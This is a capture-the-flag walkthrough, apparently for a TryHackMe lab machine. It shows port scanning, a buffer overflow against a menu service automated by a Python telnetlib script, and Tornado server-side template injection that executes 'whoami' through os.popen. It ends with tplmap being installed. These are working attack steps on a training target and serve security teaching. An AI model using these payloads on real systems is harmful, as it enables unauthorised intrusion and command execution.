NoNameCTF
Flags
Start Machine
P.S. Challenge may a take up to 5 minutes to boot up and configure!
Answer the questions below
┌──(kali㉿kali)-[~/Downloads]
└─$ rustscan -a 10.10.163.81 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.163.81:22
Open 10.10.163.81:80
Open 10.10.163.81:2222
Open 10.10.163.81:9090
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-20 12:45 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:45
Completed NSE at 12:45, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:45
Completed NSE at 12:45, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:45
Completed NSE at 12:45, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 12:45
Completed Parallel DNS resolution of 1 host. at 12:45, 0.02s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 12:45
Scanning 10.10.163.81 [4 ports]
Discovered open port 22/tcp on 10.10.163.81
Discovered open port 2222/tcp on 10.10.163.81
Discovered open port 9090/tcp on 10.10.163.81
Discovered open port 80/tcp on 10.10.163.81
Completed Connect Scan at 12:45, 0.19s elapsed (4 total ports)
Initiating Service scan at 12:45
Scanning 4 services on 10.10.163.81
Completed Service scan at 12:47, 105.61s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.163.81.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:47
NSE Timing: About 99.82% done; ETC: 12:48 (0:00:00 remaining)
Completed NSE at 12:48, 30.32s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:48
Completed NSE at 12:48, 1.77s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:48
Completed NSE at 12:48, 0.00s elapsed
Nmap scan report for 10.10.163.81
Host is up, received user-set (0.19s latency).
Scanned at 2023-01-20 12:45:51 EST for 138s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 12573fcc8639043bf0e646bf7251640b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1+fzUNMdVOD1RLT2OU1iOC5Av68TQ5E7Jy2x1IPhvOHkU8fzeWJBnAPZuxckO2mtmFL73m4mIRo4nyYmlBrTM090Hyg+P+yJUuqepuTLdjXgZW/e1YvmFXoQUXVEencwBLN3dvYJ0t+Jvu4rfCbeyzHfUkTrt6tzxaX3go8FKjVKuYMNq7frgTSWiO/k3rik1MNy4IedQOmKOCwxxAGdXXy+VcGtUAOWlIod6pBIU4CCEQJxE146xEIQI1czJuHrHXombZzfk9Ov+pY2NloxEORPQ2/sRD2+uYnfl4OBWM/uupeY4doRF5futdZ7u5XP+aHSSMRieBRMsgFuR1her
| 256 810575ad788362b206415be5a5a9824d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMgGIaiwLHXLXGtioB2ZXuN/bkckCNW8ddroXERn3jIVjGjvDOZJY+J9bR/n2bqa601xbGQLbK8cXsfu4/SjqD4=
| 256 0f8d0e19e9c7cc1439e934605cf7aafe (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINcfH8RQ/iANAMirzQDTd9DqQWtaRghdHwVVrAou0c+j
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open EtherNetIP-1? syn-ack
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, NULL, SSLSessionReq, TerminalServerCookie:
| Welcome to the NoNameCTF!
| Choose an action:
| regiser: 1
| login: 2
| get_secret_directory: 3
| store_your_buffer: 4
| GetRequest, HTTPOptions, Help, RTSPRequest:
| Welcome to the NoNameCTF!
| Choose an action:
| regiser: 1
| login: 2
| get_secret_directory: 3
| store_your_buffer: 4
| Wrong option
|_ Good bye
9090/tcp open http syn-ack Tornado httpd 6.0.3
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/plain).
|_http-server-header: TornadoServer/6.0.3
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.93%I=7%D=1/20%Time=63CAD356%P=x86_64-pc-linux-gnu%r(NU
SF:LL,7B,"Welcome\x20to\x20the\x20NoNameCTF!\r\nChoose\x20an\x20action:\r\
SF:n>\x20regiser:\x201\r\n>\x20login:\x202\r\n>\x20get_secret_directory:\x
SF:203\r\n>\x20store_your_buffer:\x204\r\n")%r(GenericLines,7B,"Welcome\x2
SF:0to\x20the\x20NoNameCTF!\r\nChoose\x20an\x20action:\r\n>\x20regiser:\x2
SF:01\r\n>\x20login:\x202\r\n>\x20get_secret_directory:\x203\r\n>\x20store
SF:_your_buffer:\x204\r\n")%r(GetRequest,93,"Welcome\x20to\x20the\x20NoNam
SF:eCTF!\r\nChoose\x20an\x20action:\r\n>\x20regiser:\x201\r\n>\x20login:\x
SF:202\r\n>\x20get_secret_directory:\x203\r\n>\x20store_your_buffer:\x204\
SF:r\nWrong\x20option\r\nGood\x20bye\r\n")%r(HTTPOptions,93,"Welcome\x20to
SF:\x20the\x20NoNameCTF!\r\nChoose\x20an\x20action:\r\n>\x20regiser:\x201\
SF:r\n>\x20login:\x202\r\n>\x20get_secret_directory:\x203\r\n>\x20store_yo
SF:ur_buffer:\x204\r\nWrong\x20option\r\nGood\x20bye\r\n")%r(RTSPRequest,9
SF:3,"Welcome\x20to\x20the\x20NoNameCTF!\r\nChoose\x20an\x20action:\r\n>\x
SF:20regiser:\x201\r\n>\x20login:\x202\r\n>\x20get_secret_directory:\x203\
SF:r\n>\x20store_your_buffer:\x204\r\nWrong\x20option\r\nGood\x20bye\r\n")
SF:%r(DNSVersionBindReqTCP,7B,"Welcome\x20to\x20the\x20NoNameCTF!\r\nChoos
SF:e\x20an\x20action:\r\n>\x20regiser:\x201\r\n>\x20login:\x202\r\n>\x20ge
SF:t_secret_directory:\x203\r\n>\x20store_your_buffer:\x204\r\n")%r(DNSSta
SF:tusRequestTCP,7B,"Welcome\x20to\x20the\x20NoNameCTF!\r\nChoose\x20an\x2
SF:0action:\r\n>\x20regiser:\x201\r\n>\x20login:\x202\r\n>\x20get_secret_d
SF:irectory:\x203\r\n>\x20store_your_buffer:\x204\r\n")%r(Help,93,"Welcome
SF:\x20to\x20the\x20NoNameCTF!\r\nChoose\x20an\x20action:\r\n>\x20regiser:
SF:\x201\r\n>\x20login:\x202\r\n>\x20get_secret_directory:\x203\r\n>\x20st
SF:ore_your_buffer:\x204\r\nWrong\x20option\r\nGood\x20bye\r\n")%r(SSLSess
SF:ionReq,7B,"Welcome\x20to\x20the\x20NoNameCTF!\r\nChoose\x20an\x20action
SF::\r\n>\x20regiser:\x201\r\n>\x20login:\x202\r\n>\x20get_secret_director
SF:y:\x203\r\n>\x20store_your_buffer:\x204\r\n")%r(TerminalServerCookie,7B
SF:,"Welcome\x20to\x20the\x20NoNameCTF!\r\nChoose\x20an\x20action:\r\n>\x2
SF:0regiser:\x201\r\n>\x20login:\x202\r\n>\x20get_secret_directory:\x203\r
SF:\n>\x20store_your_buffer:\x204\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:48
Completed NSE at 12:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:48
Completed NSE at 12:48, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:48
Completed NSE at 12:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 139.83 seconds
view-source:http://10.10.163.81/
<!--char buffer[250]; -->
<!--A*1000-->
checkme!
view-source:http://10.10.163.81:2222/
Welcome to the NoNameCTF!
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
Wrong option
Good bye
view-source:http://10.10.163.81:9090/
Traceback (most recent call last):
File "/home/zeldris/.local/lib/python3.5/site-packages/tornado/web.py", line 1676, in _execute
result = self.prepare()
File "/home/zeldris/.local/lib/python3.5/site-packages/tornado/web.py", line 2431, in prepare
raise HTTPError(self._status_code)
tornado.web.HTTPError: HTTP 404: Not Found
┌──(kali㉿kali)-[~/noname_ctf]
└─$ nc 10.10.163.81 2222
Welcome to the NoNameCTF!
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
1
Enter an username:witty
Enter a password:witty
Sorry, password too short
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
2
Username:witty
Password:witty
You're now authenticated!
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
3
My secret in the port 9090 is:
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
4
Enter your buffer:A*1000
Flag saved!
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
3
My secret in the port 9090 is: A*1000
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
>>> print("A"*1998)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
┌──(kali㉿kali)-[~/noname_ctf]
└─$ nc 10.10.163.81 2222
Welcome to the NoNameCTF!
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
1
Enter an username:A*1998
Enter a password:A*1998
User A*1998 successfully registered. You can login now!
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
2
Username:A*1998
Password:A*1998
You're now authenticated!
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
3
My secret in the port 9090 is:
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
4
Enter your buffer:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Flag saved!
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
3
My secret in the port 9090 is: /40b5dffec4e39b7a3e9d261d2fc4a038/
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
http://10.10.163.81:9090/40b5dffec4e39b7a3e9d261d2fc4a038/
┌──(kali㉿kali)-[~/noname_ctf]
└─$ nc 10.10.163.81 2222
Welcome to the NoNameCTF!
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
1
Enter an username:a
Enter a password:a
Sorry, password too short
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
2
Username:a
Password:a
You're now authenticated!
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
3
My secret in the port 9090 is:
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
4
Enter your buffer:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Flag saved!
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
3
My secret in the port 9090 is: /40b5dffec4e39b7a3e9d261d2fc4a038/
Choose an action:
> regiser: 1
> login: 2
> get_secret_directory: 3
> store_your_buffer: 4
or
┌──(kali㉿kali)-[~/noname_ctf]
└─$ cat bof.py
import telnetlib
import argparse
parser = argparse.ArgumentParser(description="BOF Exploit")
parser.add_argument("host", help="The host IP address")
parser.add_argument("port", help="The host port")
args=parser.parse_args()
#Read and write
def read(end_text):
tn.read_until(end_text.encode())
def write(text):
tn.write(("{0}\n".format(text)).encode())
#Connect
tn = telnetlib.Telnet(args.host, args.port)
#Register/Login
for i in range(1,3):
read("4") #Listen for the end of the welcome message
write(str(i)) #Pick an option (1 the first time, 2 the second)
read(":") #Wait for the end of the username prompt
write("jesus") #Enter Username
read(":") #Wait for the end of the password prompt
write("soon") #Enter password
#store buffer
read("4") #Listen for the end of the welcome message
write("4") #Pick option 4 to store a buffer
read(":") #Listen for the end of the buffer prompt
write("A"*1998) #Calculate and store the buffer
#complete overflow
read("4") #Listen for the end of the welcome message
write("3") #Pick option 3 to receive our secret directory
read("\n") #Work around to get rid of the newline preceeding response
print(tn.read_until("\n".encode()).decode()) #Output the directory
┌──(kali㉿kali)-[~/noname_ctf]
└─$ python3 bof.py 10.10.163.81 2222
My secret in the port 9090 is: /40b5dffec4e39b7a3e9d261d2fc4a038/
<html>
<head><title> Hello </title></head>
<body><section class="inside"><h2>Cyber Security training made easy</h2></br>Hello <p class='m0'>TryHackMe takes the pain out of learning and teaching Cybersecurity. Our platform makes it a comfortable experience to learn by designing prebuilt courses which include virtual machines (VM) hosted in the cloud ready to be deployed. This avoids the hassle of downloading and configuring VM's. Our platform is perfect for CTFs, Workshops, Assessments or Training.</p></section></section></div><div class="container main pb"><section class="row"><div class="col-md-4 green-hover"><h2><i class="fas fa-spider"></i> Hack Instantly</h2><p>Learn, practice and complete! Get hands on and practise your skills in a real-world environment by completing fun and difficult tasks. You can deploy VMs, which will give an IP address instantly and away you go.</p></div><div class="col-md-4 green-hover"><h2><i class="fas fa-door-closed"></i> Rooms</h2><p>Rooms are virtual areas dedicated to particular cyber security topics. For example, a room called "Hacking the Web" could be dedicated to web application vulnerabilities. </p></div><div class="col-md-4 green-hover"><h2><i class="fab fa-fort-awesome"></i> Tasks</h2><p>Each room has tasks that contain questions and hints, a custom leaderboard and chat area. Whilst you're hacking away, you can discuss hacking techniques or request help from others.</p><!-- ?hackme= --></div></section>
</body>
</html>
<!-- ?hackme= -->
http://10.10.163.81:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme=whoami
Hello whoami
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#tornado-python
https://ajinabraham.com/blog/server-side-template-injection-in-tornado
http://10.10.163.81:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme={{7*7}}
Hello 49
<div data-gb-custom-block data-tag="import"></div>
- Allows you to import python modules.
Example:
<div data-gb-custom-block data-tag="import"></div>{{ os.popen("whoami").read() }}
http://10.10.163.81:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme={%%20import%20os%20%}{{%20os.popen(%22whoami%22).read()%20}}
Hello zeldris
https://github.com/epinna/tplmap
https://github.com/epinna/tplmap/issues/64
──(kali㉿kali)-[~/noname_ctf]
└─$ virtualenv -p python2.7 env
┌──(kali㉿kali)-[~/noname_ctf]
└─$ ls
bof.py env
┌──(kali㉿kali)-[~/noname_ctf]
└─$ cd env
┌──(kali㉿kali)-[~/noname_ctf/env]
└─$ ls
bin lib pyvenv.cfg
┌──(kali㉿kali)-[~/noname_ctf/env]
└─$ cd bin
┌──(kali㉿kali)-[~/noname_ctf/env/bin]
└─$ ls
activate activate.ps1 easy_install-2.7 pip-2.7 python2.7 wheel2.7
activate.csh activate_this.py easy_install2.7 pip2.7 wheel
activate.fish easy_install pip python wheel2
activate.nu easy_install2 pip2 python2 wheel-2.7
┌──(kali㉿kali)-[~/noname_ctf/env/bin]
└─$ cd ../..
┌──(kali㉿kali)-[~/noname_ctf]
└─$ ls
bof.py env
┌──(kali㉿kali)-[~/noname_ctf]
└─$ source env/bin/activate
┌──(env)─(kali㉿kali)-[~/noname_ctf]
└─$ git clone https://github.com/epinna/tplmap.git
Cloning into 'tplmap'...
remote: Enumerating objects: 4127, done.
remote: Counting objects: 100% (50/50), done.
remote: Compressing objects: 100% (40/40), done.
remote: Total 4127 (delta 15), reused 33 (delta 10), pack-reused 4077
Receiving objects: 100% (4127/4127), 677.75 KiB | 1.39 MiB/s, done.
Resolving deltas: 100% (2694/2694), done.
┌──(env)─(kali㉿kali)-[~/noname_ctf]
└─$ cd tplmap
┌──(env)─(kali㉿kali)-[~/noname_ctf/tplmap]
└─$ ls
burp_extension config.yml docker-envs plugins requirements.txt tplmap.py
burp_extension.py core LICENSE.md README.md tests utils
┌──(env)─(kali㉿kali)-[~/noname_ctf/tplmap]
└─$ python2 -m pip install -r requirements.txt
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.
Collecting PyYAML==5.1.2
Using cached PyYAML-5.1.2.tar.gz (265 kB)
Collecting certifi==2018.10.15
Using cached certifi-2018.10.15-py2.py3-none-any.whl (146 kB)
Collecting chardet==3.0.4
Using cached chardet-3.0.4-py2.py3-none-any.whl (133 kB)
Collecting idna==2.8
Using cached idna-2.8-py2.py3-none-any.whl (58 kB)
Collecting requests==2.22.0
Using cached requests-2.22.0-py2.py3-none-any.whl (57 kB)
Collecting urllib3==1.24.1
Using cached urllib3-1.24.1-py2.py3-none-any.whl (118 kB)
Requirement already satisfied: wsgiref==0.1.2 in /usr/lib/python2.7 (from -r requirements.txt (line 7)) (0.1.2)
Building wheels for collected packages: PyYAML
Building wheel for PyYAML (setup.py) ... done
Created wheel for PyYAML: filename=PyYAML-5.1.2-cp27-cp27mu-linux_x86_64.whl size=44911 sha256=37bbeddd242824f328c5b9a19fe71d86bde8aad52e8c3c5d33409585c537c07d
Stored in directory: /home/kali/.cache/pip/wheels/87/9b/a7/9bfdaa1487acce958269a6b5f86db2e4d38204dff4e256e23a
Successfully built PyYAML
Installing collected packages: PyYAML, certifi, chardet, idna, urllib3, requests
Successfully installed PyYAML-5.1.2 certifi-2018.10.15 chardet-3.0.4 idna-2.8 requests-2.22.0 urllib3-1.24.1
